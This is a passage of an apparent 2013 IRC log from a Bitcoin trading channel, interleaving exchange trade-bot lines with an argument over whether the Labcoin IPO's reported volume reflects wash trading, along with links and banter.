[BTCGARDEN] 1968 @ 0.016 = 31.488 BTC [+] Aug 01 23:23:07 no. i refer to the fact that burnside has supposedly had close to 50k btc of net inflows this past week, Aug 01 23:23:10 [BTCTC] [CRYPTO-TRADE] 9 @ 0.1999 = 1.7991 BTC [+] Aug 01 23:23:11 [BTCTC] [CRYPTO-TRADE] 25 @ 0.1999 = 4.9975 BTC [+] Aug 01 23:23:15 which do not in fact exist as net btc inflows. paper only. Aug 01 23:23:19 [BTCTC] [TAT.ASICMINER] 156 @ 0.04151 = 6.4756 BTC [-] Aug 01 23:23:54 how do you come up with 50k inflow? Aug 01 23:23:55 [BTCTC] [LABCOIN] 4 @ 0.002292 = 0.0092 BTC [+] Aug 01 23:24:05 [BTCTC] [CRYPTO-TRADE] 16 @ 0.2 = 3.2 BTC [+] Aug 01 23:24:08 add up the various buy-ins of the various scam ipos Aug 01 23:24:26 [BTCTC] [S.MPOE-PT] 1 @ 0.0009398 BTC [+] Aug 01 23:24:43 [BTCTC] [LABCOIN] 2996 @ 0.002292 = 6.8668 BTC [+] Aug 01 23:25:01 [BTCTC] [LABCOIN] 1178 @ 0.002296 = 2.7047 BTC [+] Aug 01 23:25:18 [BTCTC] [TAT.MINIGAME] 1 @ 0.000265 BTC [+] Aug 01 23:25:31 [BTCTC] [LABCOIN] 7000 @ 0.002299 = 16.093 BTC [+] Aug 01 23:25:58 [BTCTC] [LABCOIN] 140 @ 0.0023 = 0.322 BTC [+] Aug 01 23:26:01 [BTCTC] [CRYPTO-TRADE] 30 @ 0.1998 = 5.994 BTC [-] Aug 01 23:26:13 sec Aug 01 23:27:21 [BTCTC] [TAT.ASICMINER] 95 @ 0.04191 = 3.9815 BTC [+] Aug 01 23:27:46 [BTCTC] [LABCOIN] 3 @ 0.002397 = 0.0072 BTC [+] Aug 01 23:28:08 http://i.imgur.com/NjU0oco.jpg < this is a chart of "price x outstanding shares" summed up for all listed assets -- not very representive (or maybe not at all), but it gives the impression that the money flows within the exchange Aug 01 23:28:31 [HAVELOCK] [AM100] 1 @ 0.0389 BTC [+] Aug 01 23:29:15 you can't simply sum all ipo-money and pretend those are "new" coins Aug 01 23:29:48 listen. either all ipo money are new coins, Aug 01 23:29:59 or else the ipo is buying and selling its own shares to wash trade. Aug 01 23:30:52 new coins = new on the exchange, old coins = "i sell am shares to buy lab shares" Aug 01 23:30:59 [BTCTC] [ACTIVEMINING] 150 @ 0.006394 = 0.9591 BTC [+] Aug 01 23:31:38 [HAVELOCK] [LABCO] 1000 @ 0.00254 = 2.54 BTC [+] Aug 01 23:31:58 oh come on. Aug 01 23:32:19 [BTCTC] [LABCOIN] 147 @ 0.002397 = 0.3524 BTC [+] Aug 01 23:32:20 [BTCTC] [LABCOIN] 75 @ 0.002494 = 0.1871 BTC [+] Aug 01 23:32:22 [BTCTC] [LABCOIN] 700 @ 0.002495 = 1.7465 BTC [+] Aug 01 23:32:23 [BTCTC] [LABCOIN] 78 @ 0.002496 = 0.1947 BTC [+] Aug 01 23:32:30 if i were to sell a few k's worth of am outright it'd plumet the price to half or some shit. Aug 01 23:32:36 [HAVELOCK] [LABCO] 100 @ 0.00254 = 0.254 BTC [+] Aug 01 23:32:46 and a few k's aren't a few tens of k's. Aug 01 23:32:52 would take 1k probly Aug 01 23:33:08 [HAVELOCK] [LABCO] 100 @ 0.00254 = 0.254 BTC [+] Aug 01 23:33:21 [HAVELOCK] [AM100] 6 @ 0.03899999 = 0.234 BTC [+] Aug 01 23:33:24 [BTCTC] [LABCOIN] 72 @ 0.002496 = 0.1797 BTC [+] Aug 01 23:33:24 [BTCTC] [LABCOIN] 28 @ 0.002499 = 0.07 BTC [+] Aug 01 23:33:39 [HAVELOCK] [LABCO] 4 @ 0.00254 = 0.0102 BTC [+] Aug 01 23:33:47 well, that's kinda true Aug 01 23:33:59 but almost all prices went down Aug 01 23:34:00 see, this is why this is a professional field. Aug 01 23:34:02 and people were selling Aug 01 23:34:17 this sort of educated call is difficult to distinguish from random jibberish, if you're not in the thing. Aug 01 23:34:29 generalized insults aren't the way to go here Aug 01 23:34:42 [BTCTC] [LABCOIN] 20 @ 0.002495 = 0.0499 BTC [-] Aug 01 23:34:44 [BTCTC] [LABCOIN] 592 @ 0.002499 = 1.4794 BTC [+] Aug 01 23:34:45 [BTCTC] [LABCOIN] 1000 @ 0.002499 = 2.499 BTC [+] Aug 01 23:34:46 [BTCTC] [LABCOIN] 100 @ 0.002499 = 0.2499 BTC [+] Aug 01 23:34:47 [BTCTC] [LABCOIN] 800 @ 0.0025 = 2 BTC [+] Aug 01 23:34:48 [BTCTC] [LABCOIN] 1000 @ 0.0025 = 2.5 BTC [+] Aug 01 23:34:50 [BTCTC] [LABCOIN] 40 @ 0.0025 = 0.1 BTC [+] Aug 01 23:34:51 [BTCTC] [LABCOIN] 348 @ 0.002513 = 0.8745 BTC [+] Aug 01 23:35:20 [BTCTC] [ACTIVEMINING] 410 @ 0.00635 = 2.6035 BTC [-] Aug 01 23:35:21 oh no he dittnt Aug 01 23:35:38 no insult intended. Aug 01 23:36:07 the point remains, citizen dentistry has its intrinsic limitations. Aug 01 23:36:18 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 23:37:43 i read this as "you are incapable of understanding what's going on because you are no professional" Aug 01 23:37:54 [BTCTC] [LABCOIN] 2350 @ 0.002513 = 5.9056 BTC [+] Aug 01 23:38:02 but anyway, you're shifting the frame from the topic Aug 01 23:39:14 im not saying you're incapable of understanding. quite the contrary, i'm expecting you to understand that things which may not be directly obvious to you may nevertheless be perfectly true. Aug 01 23:40:36 well, for one i don't understand how you come up with 50k inflow. labcoin's ipo were 7k, actm a bit hard to tell, but i go with 3 million shares x 0,0025 ipo price = another 7k Aug 01 23:40:49 !t btct labcoin Aug 01 23:40:51 [BTCT:LABCOIN] 1D: 0.001 / 0.00145 / 0.0044 (9468499 shares, 13713.4 BTC), 7D: 0.001 / 0.00145 / 0.0044 (9468499 shares, 13713.4 BTC), 30D: 0.001 / 0.00145 / 0.0044 (9468499 shares, 13713.4 BTC) Aug 01 23:41:00 do you see that 13.7k figure there ? Aug 01 23:41:27 yes Aug 01 23:41:55 show me your 7k. Aug 01 23:42:05 7k ipo, with 14k volume Aug 01 23:42:20 !t btct btcgarden Aug 01 23:42:21 [BTCT:BTCGARDEN] 1D: 0.015 / 0.016 / 0.01633 (773569 shares, 12377.9 BTC), 7D: 0.015 / 0.016 / 0.01633 (773559 shares, 12377.8 BTC), 30D: 0.015 / 0.016 / 0.01633 (773559 shares, 12377.8 BTC) Aug 01 23:42:32 whoa Aug 01 23:42:40 looky, randomly within 10%. together they add up to 26k Aug 01 23:42:40 wtf is BTCT vol for the day? Aug 01 23:43:11 ThickAsThieves anything you wish it to be. Aug 01 23:43:22 wait Aug 01 23:43:33 you say it's strange that the volume is so high? Aug 01 23:43:46 i am not saying it's "strange". i'm saying it's a fraud. Aug 01 23:43:56 [BTCTC] [LABCOIN] 1 @ 0.00251 BTC [-] Aug 01 23:43:57 [BTCTC] [LABCOIN] 20 @ 0.002512 = 0.0502 BTC [+] Aug 01 23:43:58 [BTCTC] [LABCOIN] 279 @ 0.002513 = 0.7011 BTC [+] Aug 01 23:44:04 dude, he can tell from te trades and having seen quite a few IPOs in his time Aug 01 23:44:07 quite simply. print random numbers, maybe some doofus acrtually takes it seriously and "invests". Aug 01 23:44:42 ThickAsThieves: last 24h volume was 31.4k Aug 01 23:44:56 [BTCTC] [LABCOIN] 20 @ 0.0023 = 0.046 BTC [-] Aug 01 23:44:57 [BTCTC] [LABCOIN] 100 @ 0.0023 = 0.23 BTC [-] Aug 01 23:44:59 [BTCTC] [LABCOIN] 900 @ 0.002299 = 2.0691 BTC [-] Aug 01 23:46:10 well.. printing numbers would be "simulate hundrets of fake trades hour for hour" Aug 01 23:46:31 no. it would simply be claiming you're trading ~100x what your actual inflow is. Aug 01 23:46:40 in this case at least. Aug 01 23:46:49 [HAVELOCK] [HIM] 73 @ 0.131 = 9.563 BTC [-] Aug 01 23:47:37 [HAVELOCK] [AM100] 2 @ 0.0389 = 0.0778 BTC [-] Aug 01 23:47:40 [HAVELOCK] [AM100] 28 @ 0.03899999 = 1.092 BTC [+] Aug 01 23:47:49 [HAVELOCK] [AM100] 1 @ 0.03899999 BTC [+] Aug 01 23:48:03 "Just curious:u r not our shareholders and will never be, then for what kind of pleasure you r seeking to push you waste your life to black others here?" Aug 01 23:48:04 rofl Aug 01 23:48:16 [BTCTC] [TAT.ASICMINER] 12 @ 0.04191 = 0.5029 BTC [+] Aug 01 23:48:26 [HAVELOCK] [LABCO] 3796 @ 0.00254 = 9.6418 BTC [+] Aug 01 23:48:35 [HAVELOCK] [LABCO] 3000 @ 0.00262 = 7.86 BTC [+] Aug 01 23:48:50 shit, dudes be blackin' me Aug 01 23:49:16 you simply don't claim the volume is xk btc - if you sum historical trades the numbers should be the same, but thus you would need to generate fake trades Aug 01 23:50:04 jurov where that ? Aug 01 23:50:12 here is some data for lab to work with: N Buys: 991 Aug 01 23:50:13 N Sells: 1532 Aug 01 23:50:13 N Share Buys: 1120098 Aug 01 23:50:13 N Share Sells: 8349721 Aug 01 23:50:13 Sum Buys: 3279,585345 Aug 01 23:50:13 Sum Sells: 10436,870816 Aug 01 23:50:28 mircea_popescu: https://bitcointalk.org/index.php?PHPSESSID=da28ds9ge29j8i06u9245p3v37&topic=264696.msg2848905#msg2848905 Aug 01 23:50:44 [HAVELOCK] [HIM] 10 @ 0.13000001 = 1.3 BTC [-] Aug 01 23:50:47 [BTCTC] [LABCOIN] 150 @ 0.002512 = 0.3768 BTC [+] Aug 01 23:50:48 [HAVELOCK] [HIM] 52 @ 0.13 = 6.76 BTC [-] Aug 01 23:50:50 [BTCTC] [LABCOIN] 20 @ 0.002512 = 0.0502 BTC [+] Aug 01 23:50:51 [BTCTC] [LABCOIN] 2830 @ 0.002513 = 7.1118 BTC [+] Aug 01 23:50:52 [HAVELOCK] [HIM] 11 @ 0.13 = 1.43 BTC [-] Aug 01 23:51:00 oh since when it uglifies urls with phpsession? Aug 01 23:51:12 buys + sells added = 13716,45 ... which represents the number shown by btct as volume Aug 01 23:51:32 dexX7 those numbers are meaningless withotu context. Aug 01 23:51:48 jurov ic Aug 01 23:51:58 so.. which context? Aug 01 23:52:08 mircea_popescu: can i buy some trilema credits here or should i mail you? Aug 01 23:52:19 here works. Aug 01 23:52:20 [BTCTC] [KENILWORTH] 49 @ 0.001749 = 0.0857 BTC [-] Aug 01 23:52:21 [BTCTC] [KENILWORTH] 11 @ 0.00175 = 0.0193 BTC [+] Aug 01 23:52:22 [BTCTC] [KENILWORTH] 1600 @ 0.001785 = 2.856 BTC [+] Aug 01 23:52:24 [BTCTC] [KENILWORTH] 594 @ 0.001799 = 1.0686 BTC [+] Aug 01 23:52:25 [BTCTC] [KENILWORTH] 1996 @ 0.001799 = 3.5908 BTC [+] Aug 01 23:52:50 [HAVELOCK] [LABCO] 1 @ 0.00262 BTC [+] Aug 01 23:52:54 i think i don't get the broader picture and we might intend to talk about different things Aug 01 23:53:23 dexX7 well asking me to specify what context your numbers have is already quite the faux pas. Aug 01 23:53:35 i have no fucking idea. your numbers, you tell me. what are they ? Aug 01 23:53:48 [BTCTC] [LABCOIN] 355 @ 0.002105 = 0.7473 BTC [-] Aug 01 23:53:50 [BTCTC] [LABCOIN] 500 @ 0.002105 = 1.0525 BTC [-] Aug 01 23:54:34 .bait Aug 01 23:54:38 http://24.media.tumblr.com/b12d6c28f73d7b49c913e881840f2d4f/tumblr_mf1p9vAiT71qfgwwmo1_1280.jpg Aug 01 23:54:47 ^ some numbers Aug 01 23:54:53 get everyone distracted by the naked girls eh? Aug 01 23:55:11 oh, that was a bad one anyway Aug 01 23:55:18 mircea_popescu nice blog post yesterday Aug 01 23:55:23 how sure are you Aug 01 23:55:35 sure enough to post. Aug 01 23:56:09 somehow I had TheSwede75 in my ignore list already Aug 01 23:56:20 i've yet to hear of a legit internet biz that astroturfs, but maybe i'm too noob. Aug 01 23:56:25 the figures looked sound Aug 01 23:56:26 N Buys (number of buys): 991, N Sells (number of sells): 1532 - N Share Buys (number of shares bought): 1120098, N Share Sells (number of shares sold): 8349721 - Sum Buys (amount of btc summed for buys): 3279,58, Sum Sells (amount of btc summed for sells): 10436,87 Aug 01 23:56:33 since trading start Aug 01 23:56:37 sshh guys finance lesson Aug 01 23:56:41 pankkake i've had a junior on the thankless task of reviewing his entire history Aug 01 23:56:46 so everyone is going apeshit over a scam shares Aug 01 23:56:52 is that what is happening here? Aug 01 23:56:54 basically smarmy idiot is the 2 word summary of 5k posts Aug 01 23:56:55 jcpham: yep Aug 01 23:57:06 interesting Aug 01 23:57:14 how many shills are in here now Aug 01 23:57:14 dexX7 what is the sells/buys distinction based on ? Aug 01 23:57:19 jcpham just you. Aug 01 23:57:29 surely they've infected the -assets as well Aug 01 23:57:36 otherwise just lazy Aug 01 23:57:37 todays show brought to you buy the number 2 (weeks) and the letters A, S, I and C Aug 01 23:57:43 yeah, read yest's log, was some pizza scandal. Aug 01 23:57:46 the api declares a trade as sell if someone sold into a bid and vice versa Aug 01 23:58:05 if you put these together, retarded people throw money at you Aug 01 23:58:06 dexX7 why do you think this is in any way meaningful ? Aug 01 23:58:17 i like how it's called labcoin Aug 01 23:58:19 [BTCTC] [BASIC-MINING] 2 @ 0.49 = 0.98 BTC [-] Aug 01 23:58:21 [BTCTC] [BASIC-MINING] 3 @ 0.4924 = 1.4772 BTC [+] Aug 01 23:58:21 me too Aug 01 23:58:22 because i think coinlab is scam Aug 01 23:58:28 needs moar e Aug 01 23:58:32 so anything "lab" is now scam Aug 01 23:58:33 i just present numbers without interpretation, this would be the next step Aug 01 23:58:33 labecoin Aug 01 23:58:36 actually labecoin would be great Aug 01 23:58:46 brb. making a deposit Aug 01 23:58:47 as it'd be straight "jerkoffcoin" in romanian Aug 01 23:58:52 it's like 'hey if you take the time to read, well, at least our name, you are exempt from this scam" Aug 01 23:59:02 i caught their thread on page 400 of 600 Aug 01 23:59:10 tried to tell em glbse was working Aug 01 23:59:22 [BTCTC] [BTCGARDEN] 3125 @ 0.016 = 50 BTC [+] Aug 01 23:59:44 naming your project labcoin is like calling it nigerian prince fund Aug 01 23:59:48 but what i wanted to show: the volume on btct is based on trades and thus if you claim the volume is rigged, one has to generate fake trades to pump the numbers Aug 01 23:59:49 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 23:59:54 i'll probably read about it one day when the thread is subpoena'd Aug 01 23:59:56 notashill was this originally rablat coin ? Aug 02 00:00:19 dexX7 yes dood. here's how it goes : exchange op gives the scam issuer 15k btc in his account. Aug 02 00:00:23 [HAVELOCK] [HIM] 39 @ 0.13 = 5.07 BTC [-] Aug 02 00:00:24 scam issuer buys his own issue Aug 02 00:00:24 [BTCTC] [BASIC-MINING] 3 @ 0.4528 = 1.3584 BTC [-] Aug 02 00:00:25 [BTCTC] [BASIC-MINING] 3 @ 0.4527 = 1.3581 BTC [-] Aug 02 00:00:44 [BTCTC] [ACTIVEMINING] 50 @ 0.005806 = 0.2903 BTC [-] Aug 02 00:00:45 [BTCTC] [ACTIVEMINING] 20 @ 0.005806 = 0.1161 BTC [-] Aug 02 00:00:45 win-win : the exchange shows fake volume which perhaps may convince someone to pay 3k for the one-vulnerability-a-week piece of crap Aug 02 00:00:48 well, that is possible Aug 02 00:00:51 the scam issuer gets a gem working. Aug 02 00:01:02 well yeah, it's possible. and this is as far as you can go. Aug 02 00:01:12 same goes for you Aug 02 00:01:14 because you personally don't have the experience/skill to call it. Aug 02 00:01:17 [BTCTC] [TAT.ASICMINER] 70 @ 0.04151 = 2.9057 BTC [-] Aug 02 00:01:18 no, the same does not go for me. Aug 02 00:01:23 without more information, we can only assume Aug 02 00:01:26 for the exact same reasons. Aug 02 00:01:28 no. Aug 02 00:01:31 [MPEX] [S.MPOE] 1513 @ 0.00081905 = 1.2392 BTC [+] Aug 02 00:01:33 [MPEX] [S.MPOE] 12700 @ 0.0008196 = 10.4089 BTC [+] Aug 02 00:01:34 [MPEX] [S.MPOE] 12805 @ 0.00082066 = 10.5086 BTC [+] Aug 02 00:01:37 it's not a matter of information. it's a matter of who we are. Aug 02 00:01:43 mpex deposit address is public right? Aug 02 00:01:45 [MPEX] [S.MPOE] 2432 @ 0.00082196 = 1.999 BTC [+] Aug 02 00:01:51 ThickAsThieves there's a public one. Aug 02 00:02:00 [BTCTC] [ASICMINER-PT] 1 @ 4.166 BTC [-] Aug 02 00:02:00 [BTCTC] [ASICMINER-PT] 5 @ 4.165 = 20.825 BTC [-] Aug 02 00:02:50 how do you connect "who we are" with "issuer bought his own shares over and over again"? Aug 02 00:03:09 suppose you had the gleet. Aug 02 00:03:18 i say you got the clap, you say w/o further information we can only assume. Aug 02 00:03:18 some stockholder advice for labcoin "That said your bitcoin assets can still be used for other purposes if you are willing to earn interest on your bitcoin capital you can either hold it and make sure they are secure or put them in some bonds such as coinlenders or just-dice for a period of time. Another possibility is to use AM as they are still providing yields on their shares in the Aug 02 00:03:18 inter-min period before your chips are developed and become a shareholder on the Friedcat list which is pretty secure less price risk of course. " Aug 02 00:03:40 Eyes to the Horizon! Aug 02 00:03:53 [BTCTC] [LABCOIN] 100 @ 0.002499 = 0.2499 BTC [+] Aug 02 00:04:16 gleet.. glap.. geez Aug 02 00:04:22 [HAVELOCK] [LABCO] 100 @ 0.00254 = 0.254 BTC [-] Aug 02 00:04:29 [HAVELOCK] [LABCO] 340 @ 0.00262 = 0.8908 BTC [+] Aug 02 00:04:31 new words ? Aug 02 00:04:34 i have a small language barrier here Aug 02 00:04:45 right. i did this deliberately, it's a stylistic device. Aug 02 00:04:46 [BTCTC] [LABCOIN] 20 @ 0.00231 = 0.0462 BTC [-] Aug 02 00:05:00 gleet is the english word for urethral discharge in men. the clap is gonorheea Aug 02 00:05:06 [BTCTC] [LABCOIN] 156 @ 0.002309 = 0.3602 BTC [-] Aug 02 00:05:15 [BTCTC] [LABCOIN] 6 @ 0.002497 = 0.015 BTC [+] Aug 02 00:05:20 x,y problem - what did you intend to say? Aug 02 00:05:41 [BTCTC] [TAT.ASICMINER] 30 @ 0.04151 = 1.2453 BTC [-] Aug 02 00:06:02 things which may not be directly obvious to you may nevertheless be perfectly true. << Aug 02 00:06:34 yes Aug 02 00:06:35 the guy from BTC Garden seems nice Aug 02 00:06:42 or maybe I tend to like chinese guys Aug 02 00:06:47 [BTCTC] [BASIC-MINING] 4 @ 0.4527 = 1.8108 BTC [-] Aug 02 00:06:48 [BTCTC] [BASIC-MINING] 1 @ 0.4923 BTC [+] Aug 02 00:06:52 http://en.wikipedia.org/wiki/Hanlon's_razor Aug 02 00:06:55 pankkake tbh i tend to like chinese guys too when it comes to asics. Aug 02 00:07:00 they scored too radically. Aug 02 00:07:03 we are nice at coinrat too Aug 02 00:07:15 too radically? Aug 02 00:07:25 crazy generous Aug 02 00:07:49 pankkake us corp with millions in financing and 1 year advantage destroyed by 2 chinese companies made out of shoestrings Aug 02 00:08:28 haha, true. didn't think of it that way Aug 02 00:08:44 anyway, it seems that big budgets falling from the sky don't give good results Aug 02 00:09:34 but they must have their "next ASICMINER", they missed the first Aug 02 00:09:54 altcoin mentality :) Aug 02 00:09:58 just like they must have their next bitcoin Aug 02 00:09:59 ^ Aug 02 00:10:46 metacoins Aug 02 00:10:54 kakobrekla : looky, over 160. jcpham to answer your q : about a dozen or so. Aug 02 00:11:02 I kick myself everyday for not getting into bitcoin early while I knew about it Aug 02 00:11:03 [BTCTC] [RSM] 30 @ 0.01351 = 0.4053 BTC [-] Aug 02 00:11:05 i'll give you 1 AMC for 3 Labcoins Aug 02 00:11:17 or 1 Labcoin for 5 LTC Aug 02 00:11:27 [BTCTC] [BASIC-MINING] 1 @ 0.4317 BTC [-] Aug 02 00:11:31 [BTCTC] [ACTIVEMINING] 2 @ 0.00581 = 0.0116 BTC [+] Aug 02 00:11:37 labcoin is just a coin Aug 02 00:11:41 ;;ticker Aug 02 00:11:42 MtGox BTCUSD ticker | Best bid: 103.20001, Best ask: 103.56700, Bid-ask spread: 0.36699, Last trade: 103.56700, 24 hour volume: 16005.30132792, 24 hour low: 103.00000, 24 hour high: 108.00000, 24 hour vwap: 105.52229 Aug 02 00:11:47 [BTCTC] [BASIC-MINING] 12 @ 0.4317 = 5.1804 BTC [-] Aug 02 00:11:48 it has value because people agreed to give it Aug 02 00:12:21 [BTCTC] [LABCOIN] 249 @ 0.002493 = 0.6208 BTC [-] Aug 02 00:12:22 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 00:12:24 [BTCTC] [LABCOIN] 20 @ 0.002494 = 0.0499 BTC [+] Aug 02 00:12:33 [BTCTC] [TAT.ASICMINER] 36 @ 0.0415 = 1.494 BTC [-] Aug 02 00:12:37 so in the end it does come down to this: without hard facts, we can only assume and thus you can decide for yourself if you believe or not.. well, i'm the one who believes i think and you are not, which is totally fine and saver, but it's too far fetched to present your thoughts as fact Aug 02 00:12:51 [BTCTC] [BTCGARDEN] 295 @ 0.016 = 4.72 BTC [+] Aug 02 00:12:53 [HAVELOCK] [LABCO] 5 @ 0.00262 = 0.0131 BTC [+] Aug 02 00:13:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0415 BTC [-] Aug 02 00:13:03 dexX7 you are avoiding the following point : not only was i here when glbse collapsed, Aug 02 00:13:09 but i said so, before it did. Aug 02 00:13:09 [HAVELOCK] [HIM] 2 @ 0.12500002 = 0.25 BTC [-] Aug 02 00:13:17 we're not equal parties in this discussion, like it or not. Aug 02 00:13:22 yes, i wasn't and i'm kinda new here Aug 02 00:13:26 [HAVELOCK] [AM1] 2 @ 4.28 = 8.56 BTC [+] Aug 02 00:13:29 [BTCTC] [TAT.ASICMINER] 49 @ 0.0415 = 2.0335 BTC [-] Aug 02 00:13:34 it's not a crime, but it doesn't enact relativism as a religion either. Aug 02 00:13:50 [BTCTC] [LABCOIN] 679 @ 0.002496 = 1.6948 BTC [+] Aug 02 00:14:06 [BTCTC] [LABCOIN] 2000 @ 0.0025 = 5 BTC [+] Aug 02 00:14:09 hehe Aug 02 00:14:11 actually, on this topic, ever read the story of ars digita's collapse ? Aug 02 00:14:22 [BTCTC] [LABCOIN] 1000 @ 0.002507 = 2.507 BTC [+] Aug 02 00:14:24 [BTCTC] [LABCOIN] 50 @ 0.002507 = 0.1254 BTC [+] Aug 02 00:14:30 [BTCTC] [ACTIVEMINING] 1094 @ 0.005813 = 6.3594 BTC [+] Aug 02 00:14:32 [BTCTC] [ACTIVEMINING] 1672 @ 0.005812 = 9.7177 BTC [-] Aug 02 00:14:33 nope, is it worth? Aug 02 00:14:33 [BTCTC] [ACTIVEMINING] 16 @ 0.005811 = 0.093 BTC [-] Aug 02 00:14:34 [BTCTC] [ACTIVEMINING] 500 @ 0.005808 = 2.904 BTC [-] Aug 02 00:14:35 [BTCTC] [ACTIVEMINING] 80 @ 0.005806 = 0.4645 BTC [-] Aug 02 00:14:36 [BTCTC] [ACTIVEMINING] 37 @ 0.005803 = 0.2147 BTC [-] Aug 02 00:14:38 [BTCTC] [ACTIVEMINING] 175 @ 0.0058 = 1.015 BTC [-] Aug 02 00:14:38 [BTCTC] [ACTIVEMINING] 190 @ 0.005797 = 1.1014 BTC [-] Aug 02 00:14:39 [BTCTC] [ACTIVEMINING] 100 @ 0.005601 = 0.5601 BTC [-] Aug 02 00:14:40 [BTCTC] [ACTIVEMINING] 50 @ 0.005599 = 0.28 BTC [-] Aug 02 00:14:41 [BTCTC] [ACTIVEMINING] 100 @ 0.005599 = 0.5599 BTC [-] Aug 02 00:14:43 [BTCTC] [ACTIVEMINING] 200 @ 0.005552 = 1.1104 BTC [-] Aug 02 00:14:44 [BTCTC] [ACTIVEMINING] 1300 @ 0.005551 = 7.2163 BTC [-] Aug 02 00:14:48 yes. Aug 02 00:15:00 [BTCTC] [ASICMINER-PT] 1 @ 4.165 BTC [-] Aug 02 00:15:02 [BTCTC] [ASICMINER-PT] 4 @ 4.165 = 16.66 BTC [-] Aug 02 00:15:24 [BTCTC] [LABCOIN] 114 @ 0.0025 = 0.285 BTC [-] Aug 02 00:15:27 [BTCTC] [LABCOIN] 1886 @ 0.0025 = 4.715 BTC [-] Aug 02 00:15:27 [BTCTC] [ACTIVEMINING] 186 @ 0.0055 = 1.023 BTC [-] Aug 02 00:15:30 fine Aug 02 00:15:32 http://trilema.com/wp-content/uploads/2011/11/arsdigita-greenspun.html Aug 02 00:15:39 ArsDigita: From Start-Up to Bust-Up Aug 02 00:15:42 thanks Aug 02 00:15:47 [BTCTC] [LABCOIN] 130 @ 0.00251 = 0.3263 BTC [+] Aug 02 00:15:58 phillip g's memorable quote, "Relativism. It was impressive in a way to see Protagoras's sophism alive and well after 2500 years. But the "all points of view are equally valid and supported only by someone's opinion" ignores the fact that it is easy to measure the correctness of business beliefs: some people are losing money and some are making money; some companies are gaining market share while others are losing mark Aug 02 00:15:58 et share." Aug 02 00:16:17 a good read anyway. Aug 02 00:16:52 "BELOW PAR SPECS WHEN COMPARED TO THE BEST" Aug 02 00:16:52 [BTCTC] [LABCOIN] 870 @ 0.00251 = 2.1837 BTC [+] Aug 02 00:16:53 [BTCTC] [LABCOIN] 1000 @ 0.002511 = 2.511 BTC [+] Aug 02 00:16:54 [BTCTC] [LABCOIN] 1000 @ 0.002512 = 2.512 BTC [+] Aug 02 00:16:56 [BTCTC] [LABCOIN] 193 @ 0.002513 = 0.485 BTC [+] Aug 02 00:16:57 [BTCTC] [LABCOIN] 2000 @ 0.002513 = 5.026 BTC [+] Aug 02 00:16:58 [BTCTC] [LABCOIN] 5937 @ 0.002516 = 14.9375 BTC [+] Aug 02 00:17:01 says The Verge Aug 02 00:17:21 the par of bestness? Aug 02 00:17:54 [BTCTC] [LABCOIN] 114 @ 0.002516 = 0.2868 BTC [+] Aug 02 00:17:56 [HAVELOCK] [HIM] 11 @ 0.12200001 = 1.342 BTC [-] Aug 02 00:18:16 [BTCTC] [LABCOIN] 3949 @ 0.002516 = 9.9357 BTC [+] Aug 02 00:18:46 [HAVELOCK] [HIM] 1 @ 0.149 BTC [+] Aug 02 00:19:28 lol thart's a point Aug 02 00:19:40 [HAVELOCK] [HIM] 1 @ 0.14988888 BTC [+] Aug 02 00:19:42 journalism, such a dead beast. Aug 02 00:20:07 http://www.reddit.com/r/Bitcoin/comments/1jgyaw/bips_bitcoin_improvement_proposal_7072_merchant/ Aug 02 00:20:12 BIPs (Bitcoin Improvement Proposal) 70-72: Merchant Services : Bitcoin Aug 02 00:21:55 http://ow.ly/i/2LIWm Aug 02 00:21:57 Ow.ly - image uploaded by @BFL_Josh (BFL Josh) Aug 02 00:22:21 [BTCTC] [LABCOIN] 1 @ 0.002516 BTC [+] Aug 02 00:22:22 They bought a lot of boxes, wonder what is in them Aug 02 00:23:12 must be avalon chips for minirigs Aug 02 00:23:18 http://www.cato-unbound.org/2013/07/31/patrick-murck/true-value-bitcoin Aug 02 00:23:18 so that's like what 50GH? Aug 02 00:23:21 The True Value of Bitcoin | Cato Unbound Aug 02 00:23:39 logical expectation says "fans" Aug 02 00:23:58 Wordpress on Bitcoin: "94 successful transactions so far, pretty low. I think it's more important philosophically to support it than it's been beneficial from a business point of view." Aug 02 00:24:08 ThickAsThieves what ?! Aug 02 00:24:10 [BTCTC] [BTCGARDEN] 31 @ 0.016 = 0.496 BTC [+] Aug 02 00:24:21 you mean to tell me the grand total txns is 94 since they introduced it ? Aug 02 00:24:37 thats what he says Aug 02 00:24:43 http://www.reddit.com/r/IAmA/comments/1jg781/i_am_matt_mullenweg_cofounder_of_wordpress_18_of/cbee3at Aug 02 00:24:45 ahahaha Aug 02 00:24:46 Ov0834478HB8 comments on I am Matt Mullenweg, co-founder of WordPress (18% of web) and Automattic, a Aug 02 00:24:51 pls. moar consumer bitcoin stuff. Aug 02 00:24:58 consumers have btc to spend!!1 Aug 02 00:25:01 mjr_ ^ Aug 02 00:25:03 [BTCTC] [BTCGARDEN] 20 @ 0.0159 = 0.318 BTC [-] Aug 02 00:25:05 [BTCTC] [BTCGARDEN] 65 @ 0.0159 = 1.0335 BTC [-] Aug 02 00:25:06 [BTCTC] [BTCGARDEN] 10 @ 0.01562 = 0.1562 BTC [-] Aug 02 00:25:08 [BTCTC] [BTCGARDEN] 5 @ 0.01556 = 0.0778 BTC [-] Aug 02 00:25:18 I would really love a site with high end audio gear that accepts btc Aug 02 00:25:21 ^ nice IPO Aug 02 00:25:43 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [+] Aug 02 00:25:46 like Neumann? Aug 02 00:26:21 http://blogs.wsj.com/moneybeat/2013/07/31/bitcoin-and-the-rise-of-a-digital-counterculture/?mod=wsj_nview_latest Aug 02 00:26:24 Bitcoin and the Rise of a Digital Counterculture - MoneyBeat - WSJ Aug 02 00:26:29 by Paul Vagina Aug 02 00:26:35 Yes actually Aug 02 00:26:35 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [+] Aug 02 00:26:53 Hi. Any specific opinions on the MyMiner IPO? Aug 02 00:26:55 [BTCTC] [BTCGARDEN] 301 @ 0.016 = 4.816 BTC [+] Aug 02 00:27:16 [BTCTC] [LABCOIN] 1 @ 0.0023 BTC [-] Aug 02 00:27:20 nope Aug 02 00:27:38 grilledcat what is it ? Aug 02 00:28:35 Hardly anyone's talking about it, it's hard to find good contrary evidence. They're going to buy chips and turning them into mining machines. Aug 02 00:28:45 from whom ? Aug 02 00:29:11 Whoever has the best deal on chips at the time. Aug 02 00:29:22 lol Aug 02 00:29:27 Most of the talk is in the Chinese forums. Aug 02 00:29:40 mkay. and let me guess : 